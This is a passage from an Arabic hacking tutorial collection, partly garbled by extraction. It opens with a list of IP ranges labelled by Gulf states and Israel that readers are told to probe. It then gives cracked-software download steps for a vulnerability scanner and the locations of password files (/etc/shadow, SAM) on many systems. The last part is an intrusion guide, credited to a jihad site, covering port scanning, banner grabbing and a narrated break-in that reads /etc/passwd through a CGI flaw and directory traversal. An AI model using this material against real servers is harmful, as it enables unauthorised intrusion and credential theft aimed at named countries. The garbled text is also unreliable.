‫‪<-----------194.1‬السعوديه‬ ‫‪ <----------212.42.6.80.229..150.25.70.229.1‬البحرين‬ ‫‪183‬‬ .8.82.ayna.255.133.238.113.203.58.180.1‬الكويت‬ ‫‪ <-----------194.187.1‬أسرائيل‬ ‫‪<---------128.1.145.170.198.200.226.114.7.8.40.188.2.120.25.0.1‬أسرائيل‬ ‫‪<----------62.255.1‬أسرائيل‬ ‫‪<--------212.1‬أسرائيل‬ ‫‪ <------------212.195.203.32.1.39.58.106.7.1‬السعوديه‬ ‫‪ <-----------195.139.143.30.1‬المارات‬ ‫‪ <-------------208.1‬أسرائيل‬ ‫‪<--------199.1‬عمان‬ ‫‪ <----------193.82.3.255---------------212.zip‬‬ ‫خذوا هذه اليبات وبحثوا فيها شدوا حيلكم في اليبيات الولى‬ ‫‪<--------212.255<------------206.204.255.26.1‬أسرائيل‬ ‫‪<-------193.188.1‬قطر‬ ‫‪ <-----------206.255<------------206.1.114.255-----------------62.255<-------------168.255----------------128.

e3sar.exe‬‬ ‫وبعد مايكتمل التحميل حمل الكراك من هنا‬ ‫‪http://www.com/SSS.exe‬‬ ‫الطريقة‪:‬‬ ‫========================================‬ ‫بعد تحميل البرنامج وتنزيله وعمل ‪ SetUp‬له‬ ‫افتح الكراك‬ ‫وبعد ذلك ستظهر هذه الصورة‪:‬‬ ‫‪184‬‬ .‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة ةةةةةة<‬ ‫نبذة بسيطة عن البرنامج‪:‬‬ ‫هذا البرنامج هو أكثر البرامج فعالية في اكتشاف الثغرات وأيضا المنافذ المفتوحة ف المواقع ولديه أعمال‬ ‫كثيرة لكني لن أتطرق إل لعملية واحدة فقط وهي شرح كيفية اكتشاف الثغرات في المواقع ومعرفة النطاقات‬ ‫المستخدمة لهذا الموقع وبالنسبة للخيارات الباقية لن أشرحها لنها سوف تأخذ وقت طويل لكني سوف أقسم‬ ‫شرحي لهذا البرنامج لقسام عدة وسوف أبدئها بالعظم وهو شرح لكيفية إخراج ثغرات الموقع والمنافذ‬ ‫الخاصة به والمواقع المسجل بها والمزيد من الوظائف‬ ‫أول تنزيل البرنامج وتنصيب الكراك ‪Shadow Scan Security‬‬ ‫مافيه أبسط منه‬ ‫حمل البرنامج من هذي الوصلة‬ ‫‪http://www.safety-lab.35.net/almodammer/ShadowSecurityScanner5.

‫‪+++++++++++‬‬ ‫ٍ[]‪ ][1‬اضغط ليتم تنفيذ الكراك‬ ‫[]‪ ][2‬بعد إتمام عملية الكراك اضغط هنا للخروج‬ ‫========================================‬ ‫*****& شـــ البرنامج ـــرح &*****‬ ‫سوف أشرح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال‬ ‫=)بعد تحميل البرنامج قم بفتحه من قائمة‬ ‫ابدأ ‪Start‬‬ ‫وابحث عنه ضمن البرامج‬ ‫بعد إيجاد البرنامج قم بفتح‬ ‫‪ShadowScanSecurity‬‬ ‫ليـأتي لك هذا(=‬ ‫الشكل ‪-1-‬‬ ‫أثناء الضغط على ‪Scanner‬‬ ‫الشكل‪-2-‬‬ ‫‪185‬‬ .

‫‪ =1‬إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم ‪ 4‬ولكن تحمل اسمك )ولداعي لن تنشأ‬ ‫باحث أو سياسة جديدة لك يكفيك الموجودة(‬ ‫‪ =2‬إعدادات لهذا الباحث وأيضا انا لأنصحك بتغيير شيء أبدا في هذا الخيار‬ ‫‪ =3‬حذف الموجه الجديد التي انت صممته والمقصود اليقونة التي تشبه رقم ‪ 4‬ولكن من تصميمك فبضغطك‬ ‫هنا سوف تحذفها‬ ‫‪ =4‬عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء‬ ‫‪ =5‬لرجوع للخلف ولأظن أن هناك رجوع لنها العملية والطار الول‬ ‫‪ =6‬اضغطها إذا أردت المتابعة‬ ‫‪ =7‬إزالة الطار‬ ‫الشكل‪-3-‬‬ ‫‪186‬‬ .

‫)‪ (1‬للرجوع إلى الشكل ‪-2-‬‬ ‫)‪ (2‬الذهاب إلى العملية التالية‬ ‫)‪ (3‬إلغاء إكمال العملية‬ ‫الشكل‪-4-‬‬ ‫‪ +1+‬إضافة موقع للبحث فيه‬ ‫‪ +2+‬إضافة أي بي من وإلى‬ ‫‪ + 3+‬تحميل من ملف سواء كان يحتوي على مواقع تريد البحث عنها او آي بيات‬ ‫‪ +4+‬عند إضافة موقع وبعد تحديده أثناء الضغط هنا سوف ينحذف‬ ‫‪ + 5+‬العودة والرجوع إلى الخلف أي‪ :‬الشكل‪-3-‬‬ ‫‪ + 6+‬إتمام العملية‬ ‫‪ + 7+‬إزالة والخروج من الطار إلى واجه البرنامج الرئيسية كباقي الزرار السابقة في الشكال السابقة‬ ‫الشكل‪-5-‬‬ ‫أثناء ضغط الزر ‪ Done‬وفي الخطوة السابقة سوف يظهر هذا المربع الكبير‬ ‫ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر‬ ‫‪187‬‬ .

‫الشكل‪-6-‬‬ ‫بعد الضغط على ‪ Start Scan‬وذلك بتظليل الموقع والضغظ بزر الفأرة اليمين‬ ‫انتظر قليل بعد ضغطك لرقم ‪ 1‬في الشكل‪-5-‬‬ ‫وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل‬ ‫انتهى‪،،،‬‬ ‫" اماكن وجود ملف الباسورد في أنظمة التشغيل "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةة ةةةة<‬ ‫في نطم ليونكس‬ ‫‪etc/shadow/‬‬ ‫‪188‬‬ .

winnt/repair/sam or sam/‬‬ ‫في الويندوز اكس بي البروفيشينال واصدارات الويسلر )) سيرفر ‪ -‬ادفانسد سيرفر ((‬ ‫لن تجد الويندوز في مجلد ‪WINNT‬‬ ‫ولكن سيكون كالويندوز العادي ‪.XP .passwd/‬‬ ‫في نظم السيليكون جرافيكس ‪ SGI‬المسمى ‪ARIX‬‬ ‫‪etc/shadow/‬‬ ‫نظام اي بي ام المسمى ‪AIX‬‬ ‫‪etc/security/shadow/‬‬ ‫نظم يونكس بصفه عامه ))اتش بي يو اكس ‪ )) -‬ترو يونكس ‪ )) 64‬خاص بالمنفريم ونظم الريسك ‪64‬‬ ‫وبعض منتجات اللفا (( (( ((‬ ‫‪etc/shadow/‬‬ ‫))اغلب هذه الصدارات تعتمد تشفير ‪ MD5‬القوي ((‬ ‫نظم ويندوز بصفه عامه )) ‪(( NT .2000‬‬ ‫)) الملف المفعل بتشفير ‪(( LanMan‬‬ ‫‪winnt/system32/config/sam/‬‬ ‫))هذا الملف مغلق عادة ال عند القلع من النظام ول يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان‬ ‫لديك صلحيات الدمنيستريتور ((‬ ‫))الملف الحتياطي ((‬ ‫‪_.‫في نظم صن ميكروسيستيمز‬ ‫‪etc/shadow/‬‬ ‫في نظم ال ‪ BSD‬بصفه عامه‬ ‫‪etc/master.Windows‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق الموقع )الجزء الول( "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪189‬‬ .

‬‬ ‫‪ Telnet‬هو برنامج يستخدم في إنشاء وصله بين جهازين ‪،‬و الجهاز المتصل يستخدم عنوان الجهاز‬ ‫المستهدف و رقم المنفذ ‪ Port‬الذي سيتم التصال عليه ‪،‬و الجهاز المستهدف )الخادم( يشغل برنامج آخر )‬ ‫‪ (Daemon‬يستمع على هذا المنفذ و تتم عمليه الرسال والستقبال باستخدام أحد البروتوكولت ‪..‬‬ ‫سأعيد تعريف ‪ Telnet‬من جديد و لكن بطريقه اكثر بساطه ‪.zdnet.. 21‬‬ ‫أين الصعوبة إذن ؟‬ ‫الصعوبة تكمن في أننا لكي نستخدم ‪ Telnet‬ك ‪ FTP Client‬يجب علينا اللمام بقدر كبير ببروتوكول‬ ‫‪!! FTP‬‬ ‫و لكن هذا لن يمنعني من عرض بعض المثلة لظهار كيفية التعامل مع هذا البروتوكول ‪.‬‬ ‫‪ -2‬الخطوة التالية هي الولوج باستخدام اسم المستخدم ‪ Username‬و كلمة السر ‪ ..‬‬ ‫استخدام ‪ Telnet‬ك ‪FTP Client‬‬ ‫المنفذ الذي سيتم التصال عليه في حاله استخدامنا بروتوكول نقل الملفات ‪FileTransfer Protocol‬‬ ‫في الغالب سيكون ‪.com NcFTPd Server (licensed copy) ready 220‬‬ ‫و السطر السابق يسمي ‪ Banner‬الخاص بال ‪ FTP Daemon‬المستخدم في موقع ‪ zdnet‬و هي‬ ‫تختلف باختلف الموقع الذي سيتم التشبيك عليه ‪ ...‬و الرقم الموجود في البداية يدل على نجاح التصال و هو‬ ‫رقم ثابت ‪.com‬بالمنفذ ‪21‬‬ ‫و هذا ما سيظهر لك‬ ‫‪ . Password‬بما أن‬ ‫‪ zdnet‬تدعم المستخدم ‪ Anonymous‬سيتم استخدامه في الولوج للنظام كالتالي‪:‬‬ ‫ستكتب‬ ‫‪ .zdnet.‬‬ ‫ربما لصعوبة الموضوع و تشعبه ‪ .‬و لنفرض أيضا أن هذا الرجل ل يتحدث العربية‬ ‫‪ .‬و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى‬ ‫فكرة بسيطة عن هذا الموضوع الممتع ‪.‬إذن فلبد لك من استخدام الفرنسية )البروتوكول المستخدم( حتى تتحدث )الرسال والستقبال( بحريه ‪.‬‬ ‫تشبيه من حياتنا العملية ‪ :‬نفترض أن هناك رجل في فرنسا )المستهدف( و أنت )المتصل( تريد إقامة حوار‬ ‫معه )وصله( و أنت في مصر ‪ ..l19-sj-zdnet.‬‬ ‫بدء التصال‬ ‫‪ -1‬قم بتشغيل ‪ Telnet‬و شبك على ‪ ftp..Sources Code‬شفرة‬ ‫‪.‬كما انه لبد لنا من أن نعرف أيضا أنه لبد من‬ ‫برنامج ‪ Daemon‬يتسمع على المنفذ المراد التصال عليه ‪.Sources Code‬شفرة‬ ‫‪190‬‬ .‬و انه لبد لنا من معرفة البروتوكول‬ ‫المستخدم في التصال حتى ننجح في الرسال و الستقبال ‪ ...‫مقدمه ‪:‬‬ ‫مرت فترة طويلة منذ الدرس السابق ول اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس ‪.‬‬ ‫مما سبق نستنتج أن ‪ Telnet‬هو مجرد وصله )مثل الهاتف( ‪ ..‬فلبد لك من استخدام وسيله اتصال )‪ (Telnet‬و لنفرض أنها الهاتف الذي‬ ‫لبد للرجل أن يضعه على أذنه )‪ (Daemon‬لكي يسمعك ‪ ..

Sources Code‬شفرة‬ ‫‪.Sources Code‬شفرة‬ ‫‪.Sources Code‬شفرة‬ ‫‪pass @zorro‬‬ ‫و بالطبع عند الولوج بالمستخدم ‪ Anonymous‬تقوم بإعطاء عنوان البريد اللكتروني الخاص بك ككلمة‬ ‫السر ‪ .‫‪user anonymous‬‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ .‬‬ ‫و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ‪.You are user #552 of 2000 simultaneous users allowed-230‬‬ ‫‪-230‬‬ ‫‪.‬و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد )أي يحتوي على الرمز) @‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ ..‬‬ ‫بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لرسال واستقبال البيانات )قائمه بالملفات الموجودة أو‬ ‫الملفات ذاتها( ‪ .‬‬ ‫أنت الن قد قمت بالولوج إلى الخادم بنجاح ‪.Logged in anonymously 230‬‬ ‫و بالطبع تلك الستجابه قد تختلف من موقع لخر ‪ ..‬‬ ‫و لكي ننشئ تلك الوصلة ‪،‬هناك طريقتين‬ ‫الولي ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون )أنت( رقم ‪ IP‬الخاص به و المنفذ المفتوح الذي‬ ‫يستطيع الخادم استخدامه في إرسال البيانات ‪.Guest login ok.‬‬ ‫الثانية ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون المر ‪PASV‬‬ ‫‪191‬‬ ..‬‬ ‫و لذلك لن نستخدم تلك الطريقة ‪. send your complete e-mail address as password 331‬‬ ‫ثم تكتب أنت التالي‬ ‫‪ .‬إل في الرقم في بداية كل سطر ‪.‬إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لرسال الوامر‬ ‫للنظام و استقبال استجابة النظام على الوامر ‪...

189..69.‬‬ ‫مثال‬ ‫‪ .61.Data connection already open.Sources Code‬شفرة‬ ‫‪.Sources Code‬شفرة‬ ‫‪(Entering Passive Mode (207..69.Sources Code‬شفرة‬ ‫‪PASV‬‬ ‫و سيرد الخادم برقم ‪ IP‬الخاص به و المنفذ المفتوح )على الخادم بالطبع( الذي يستطيع الزبون )أنت(‬ ‫التصال عليه ‪. 3113‬‬ ‫إذن عندما تريد أن ترسل أحد الوامر سترسله من النافذة الولى و النافذة الثانية ستظهر بها البيانات ‪.Sources Code‬شفرة‬ ‫‪LIST‬‬ ‫سيستجيب الخادم بالتالي في النافذة الولى أيضا‬ ‫‪ ..189...61‬‬ ‫أما الرقمان التاليان فيمثلن رقم المنفذ و يتم حسابه كالتالي‬ ‫‪3113 = 41 + 256 × 12‬‬ ‫و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ ‪.com‬بالمنفذ‬ ‫‪.‬‬ ‫أول أربع مجموعات )من اليسار( هو ال ‪ IP‬الخاص بالخادم و في هذه الحالة يكون ‪. 3113‬‬ ‫ولكي تقوم بمثل هذا المر يتوجب عليك فتح نافذة ‪ Telnet‬جديده و تشبك على ‪ ftp.zdnet.‬‬ ‫مثال‬ ‫عندما ترسل المر ‪( LIST‬يستخدم لعرض محتويات الدليل( في النافذة الولى‬ ‫‪ .12.41 227‬‬ ‫و الرقم الطويل الموجود بين القواس تفسيره كالتالي ‪. 207.. Transfer starting 125‬‬ ‫‪192‬‬ .‫‪ .

‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المواقع )الجزء الثاني( "‬ ‫> منقول من موقع الجهاد<‬ ‫>الكاتب‪ :‬الكندور<‬ ‫‪193‬‬ .‬‬ ‫و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ‪ ،‬يجب أن تبدأ بأمر‬ ‫‪ ..edu/htbin/rfc/rfc0959.vbip.asp‬‬ ‫)ينصح به بشده(‬ ‫‪) http://www.‬و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع‬ ‫)ممتع بالنسبة إلي( ‪.ohio-state. PASV‬ثم تنشئ اتصال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة ‪.htm‬ينصح به بشده(‬ ‫‪) http://www.‬‬ ‫إلى هنا و أظن أنني قد تماديت ‪ .vbip.cis.com/winsock/winsock_ftp_01..‬‬ ‫ملحظات هامة‬ ‫ لربما تتساءل الن ‪ .‬أل أستطيع بدل من كل هذا الهراء أن استخدم برنامج جاهز مثل ‪ CuteFTP‬؟!!‬‫بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول‬ ‫تستطيع أن تصنع برنامجك الخاص‬ ‫ اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت‬‫ لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية‬‫‪http://www.html‬لمن اراد التعمق في‬ ‫البروتوكول(‪.‫و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق التصال في النافذة الثانية بمجرد إتمام عرض‬ ‫محتويات الدليل ‪.com/winsock/winsock_ftp_ref_01..

25 .37 ..7lem.513 .com‬توجد به خدمه تلنت ‪ ،‬ويتضح هذا‬ ‫من عمليه مسح المنافذ ‪،‬التصال بخدمه اتلنت‬ ‫‪/telnet http://www.com‬بعض برامج‬ ‫البحث تطلب وضع رقم الي بي للموقع ‪ ،‬ولتقبل الدوماين عندها إستخدم ‪ ping‬لتعرف رقم الي بي(‬ ‫تأتي النتائج ‪ ،‬البورتات )‪ (587 .21‬ويوجد منافذ‬ ‫أخرى لكن لن نهتم لها هنا ‪ ،‬نقوم بعمليه نزع التواقيع للمنافذ‪.110 .‬‬ ‫ماهي عمليه نزع التواقيع للمنافذ؟‬ ‫من المعروف أن المنفذ فتح من قبل تطبيق ‪ ،‬عند التصال بهذا المنفذ فسوف يتم إرجاع رد اليك ‪ ،‬مثل لو‬ ‫إتصلت بالبورت ‪ 23‬وهو لتلنت ‪ ،‬وموقع ‪ /http://www.7lem.23 ..inscure.22 .‫الختراق ‪:‬‬ ‫~~~~~~~~~‬ ‫ المقدمة ‪.514 .org/nmap‬وهي تعمل على نظام ليونكس ‪،‬‬ ‫إذا أردت برنامج يعمل على ويندوز انصحك بـ ‪ ، SuperScan‬عليك البحث عنها في النترنت ‪ ،‬سوف تجد‬ ‫آلف المواقع التي تقدمها لتنزيل ‪ ،‬ومن الممكن أن تستخدم نصوص ‪ Perl‬لعمليه البحث ‪ ،‬لغه ‪Perl‬‬ ‫أصبحت اللغه محبوبه لدى جميع الهاكر بعد ‪C‬‬ ‫بعد الحصول على النتائج ‪ ،‬مثل نصلح تجربه على الموقع ‪ ( /http://www.7lem.‬‬‫ كيف أجمع معلومات حول الموقع ؟‬‫ كيف يتم كشف نقاط الضعف ؟‬‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫ بماذا يفيدني هذا الملف ؟‬‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫‪ -‬ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬ ‫المقدمة ‪-:‬‬ ‫~~~~~~~~~‬ ‫أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللزمه لفهم كل ما‬ ‫أتحدث عنه ‪ ،‬ل تتوقع إني بقول لك نزل برنامج ) مثل ‪ ( Void Eye‬أو غيره وحط لك في هذا المستند‬ ‫شرح بالصور وقول لك إخترق مواقع ‪ ،‬العمل المقزز هذا لن نتطرق له أبدًا‬ ‫ كيف أجمع معلومات حول موقع ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أول خطوه تصلحها هي بورت سكان ‪ ،‬أنصحك تستخدم ‪ nmap‬المشهوره والقواء على الطلق‪،‬يمكن أن‬ ‫تبحث عنها هذا إذا ما لقيتها في الموقع ‪ www.com‬‬ ‫‪194‬‬ .143 .

‬‬ ‫‪---------------------‬‬‫أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ‪ ،‬اتمنى أن تستطيع كشفه بنفسك‪.‬هذا المستند ل يختص بـ‬ ‫‪ Linux‬لذلك لن أذكرها ‪ ،‬تأتي نتيجه التصال بسيرفر الحلم على بورت التلنت‬ ‫‪---------------------‬‬‫‪SunOS 5.7lem..3.‬‬ ‫‪... info‬الخ ( أو أدرت معرفه الـ ‪ DNS‬الولي والثانوي للموقع ‪ ،‬أو من هو الشخص‬ ‫اللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ‪ ،‬عليك بإستخدام خدمه ‪ ، whois‬تستطيع‬ ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بيانات ‪ whois‬عن طريق أمر ‪ whois‬في لينكس ‪،‬‬ ‫أكتب ‪ man whois‬لمزيد من المعلومات ‪ ،‬إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الى‬ ‫برمجيات السي جي آي المتواجد في الموقع‬ ‫‪195‬‬ ......‬‬ ‫من المعروف من عمليه السكان بورت بأن البورتين ‪ 110‬و ‪ 25‬مفتوحين ‪ ،‬هذا يدل على أن في الموقع‬ ‫خدمة البريد اللكتروني ‪ ،‬بالطبع هذا يفيدك لمعرفه ‪ smtp‬و ‪ pop‬للموقع ‪ ،‬كل ماعليك فعله هو كتابه المر‬ ‫التالي )في ‪( Linux‬‬ ‫‪host 7lem.com‬مثل ) ‪ support‬أو‬ ‫‪ webmaster‬أو ‪.‬يأتيك الرد بأن النظام ‪SunOS 5.login :‬‬ ‫يتضح بأن السيرفر يعمل على نظام ‪، SunOS 5.com‬‬ ‫وأنتظر النتائج‬ ‫ملحظه ‪ -:‬إذا كنت تعيش مع بن لدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراليميل‬ ‫)على حسب ما يسمياها كثير من الناس(‬ ‫ملحظه ثانيه ‪ -:‬إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثل قرصنه‬ ‫النظام ‪.‬‬ ‫‪.‬الخ ‪ ،‬عليك أن تستخدم ‪ queso‬الداة المفضله لكشف نظام التشغيل ‪ ،‬وهي تعمل على ليونكس ‪،‬‬ ‫لستخدامها عليك كتابه‬ ‫‪/queso http://www..7‬‬ ‫لو أردت مثل قائمة بالبريدات الموجوده في موقع ‪ /http://www.com/ 80‬‬ ‫‪---------------------‬‬‫‪..‬‬ ‫‪Apache/1.* Server‬‬ ‫‪.‬‬ ‫‪.7‬بقي عليك أن تنتزع التواقيع من البورتات المتبقيه‬ ‫لتعرف ما هو التطبيق وإصدارته المنصت لها )إستخدم التلنت ( ‪ ،‬وثم تقوم ببحث عن نقاط ضعف لها‬ ‫وتحصل على شيفرات الستثمار الخاصه بها ‪ ،‬الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل‬ ‫على هذا النظام ‪ ،‬نذهب الى الترمينال تبع ليونكس ونكتب‬ ‫‪nc http://www.condor..‫يتم تنفيذ المر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪ QNX‬بنفس الصيغه ‪،‬‬ ‫ولكن أفضل ‪ Linux‬عنها ‪ ،‬وهو لن لينكس يوفر كل ماتحتاجه من أدوات ‪.7‬‬ ‫‪---------------------.com‬‬ ‫كل ماعليك بعد تثبيت الداة في جهازك هو كتابه ‪ queso‬وثم مسافه والموقع ورقم البورت ‪ 80‬والذي هو‬ ‫بطبيعه الحال مفتوح في جميع المواقع‪.7elm.

..fbunet.html‬‬ ‫توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ‪ ،‬هناك رياضيات لطلب‬ ‫معلومات عن موقع ويب بإستخدام ‪ whois‬وهي مفيده جدا ‪ ،‬على كل حال توجه الى الموقع التالي لمزيد‬ ‫من التفاصيل‬ ‫‪http://www...‬إستمر في القراءة فقط‬ ‫‪++++++++++++++++++++++++‬‬ ‫الجزء الثاني‬ ‫} ‪ { http://www.org/tools/index.com/search?q=whois&btnG=Google+Search‬‬ ‫ كيف يتم كشف نقاط الضعف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ل تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬هذه للمغفلين فقط!!‪ ،‬المحترفين‬ ‫واللي يبغا يكون محترف ل يستخدم برامج في عمليات الختراق ‪ ،‬ول يخترق لمجرد أنه يبغا يخترق ‪ ،‬عمليه‬ ‫إختراق سيرفر تمتاز بالدقه المتناهيه ‪ ،‬والتخطيط المحكم ‪ ،‬وكل عمليات السطو المحكمه هي التي يصعب‬ ‫إكتشاف مرتكبيها ‪ ،‬لكن وال لو كنت من اللي يشغل برنامج ومايدري ال وين حاطه فصدقني إنك ماراح تفلح‬ ‫طول عمرك ‪ ،‬هذا لو قدرت تخترق شئ ‪ ،‬فلو حدث وتم الختراق بواحد من هذه البرامج فسوف تصطاد‬ ‫بسناره تماما كالسمكه‬ ‫نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنها ال بعد فتره طويله هي التي في ملقم الويب مثل‬ ‫‪ Apache‬أو ‪ ، IIS‬وكذلك نقاط الضعف الموجوده في سكربتات ‪ CGI‬و ‪ Perl‬و ‪ ، PHP‬أو التي قد‬ ‫تكون موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ‪ ،‬وإذا كان في الموقع برنامج‬ ‫لتسوق مثل من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ‪ ،‬يعني اي شئ في السيرفر سوى كان‬ ‫سكربت بيرل أو سي جي آي‪.de/cgibin/nph-%20%20%20%20%20.cgi‬هذا ‪ ، CGI‬ل‬ ‫تستغرب ‪ ،‬هذه هي الحركات الجديده لنشر ال نكمل الموضوع ‪..1.7b‬تركنا المنتدى ورحنا‬ ‫ندور على شئ ثاني ‪ ،‬فتحت السورس تبع الصفحه وبحثت عن ‪ cgi‬و ‪ ، pl‬وجدنا سكريبت ثاني ‪ ،‬علبة‬ ‫توصيت ‪ ،‬نبحث عن نقاط ضعف لها ‪ ،‬ل شئ تماما ‪ ،‬نكمل البحث عن السكريبتات ‪ ،‬وأخيرا وعندما وصل‬ ‫التحميل للغنيه عند ‪ % 80‬كنت قد توصلت لنقطه ضعف في سكريبت ‪ cgi‬خاص لعداد الزوار ‪ ،‬تمكنك من‬ ‫عرض أي ملف في السيرفر ‪ ،‬طلبت الملف ‪ etc/passwd‬وطبعا كلمة المرور المسجله في المف كانت‬ ‫مضلله والنظام كان هو ‪ FreeBSD‬يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملف‬ ‫‪ shadow‬أو ‪ ، master.‬‬ ‫‪196‬‬ .‫‪http://www.google..passwd‬لتشغل بالك الن بما تعنيه كلمة مضلله ومافائده هذا الملف ‪.1.8b‬توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ‪ ،‬ولكن‬ ‫كانت نقاط الضعف لـ ‪ Ikonboard v2..‬أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه‬ ‫ضعف من الممكن أن يعرض السيرفر للختراق ويعرض كل ما بداخله من أسرار الى المخترق ‪ ،‬سأختار لكم‬ ‫حادثه مره معي‬ ‫‪ ،‬عداد زورا‬ ‫‪ counter‬عرض موقع‬ ‫‪ mp3‬مشهور للختراق في أي لحظه ‪ ،‬أول مادخلت الموقع ونزلت أغنيه ‪ Don't Tell Me‬في الوقت‬ ‫اللي كانت الغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ‪ ،‬ما كنت أتوقع أني‬ ‫بلقي نقاط ضعف فيه ‪ ،‬فتحت التلنت‬ ‫وشبكت على كم بورت معروف مثل ‪ 25‬و ‪ 23‬و ‪ 21‬و ‪ 110‬الخ ‪ ،‬دخلت منتدى في الموقع واخذت إسم‬ ‫المنتدى ‪ Ikonboard v2.1.psyon.8b‬وليس ‪ ، Ikonboard v2.‬كل‬ ‫هذا ستعرفه قريبا ‪.

.././././‬أو حتى من الممكن أن تضع بعد عنوان‬ ‫الموقع ‪ /.com‬‬ ‫نوع آخر ‪ ،‬يكون الستثمار )من الن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره( يكون‬ ‫الستثمار على شكل شفره )كود( مكتوب ببرنامج ‪ sh‬في ليونكس ‪ ،‬وهو ما يسمى بالعربي برنامج الغلف‬ ‫وبالنجليزي ‪ shell‬وتكون هذه الشفره تحت ملف بالمتداد *‪ sh././././.../.../‬فقط ‪ ،‬هل عرفت ما تعرض لك هذه الخيره !‬ ‫الن سوف أضع النقاط الساسيه لكشف نقاط ضعف على موقع ما ‪-:‬‬ ‫‪ -1‬التعرف على كافه الخدمات الموجوده على السيرفر‬ ‫‪ -2‬معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان‬ ‫ذلك ممكن ‪ ،‬أو برنامج للبيع والشراء ‪././.‬وتعمل تحت بيئه ليونكس ‪ ،‬وهذا النوع‬ ‫من الستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الداوت في ليونكس فإن لغه ‪shell‬‬ ‫اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز )‪(bat‬‬ ‫‪197‬‬ ./.timduff...Cgi‬الموجوده في الموقع ‪ ،‬هذا إذا وجد شئ منها‬ ‫‪ -4‬ولتنسى تحط البورتات معها ‪ ،‬لنه أحيانا يكون في البورت نقطه ضعف ‪ ،‬ليس هذا صحيحا ‪%100‬‬ ‫نقطه الضعف ليست في البورت بعينه ‪ ،‬في البرنامج اللي مصلح إنصات للبورت )هذا أقرب تعبير لها(‬ ‫‪ -5‬أخيرا يمكنك الستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف )يوجد في آخر هذا‬ ‫المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات(‬ ‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خلل المتصفح ‪ ،‬مثل المثال‬ ‫السابق ذكره لختراق الموقع ‪/http://www...././....‬الخ‬ 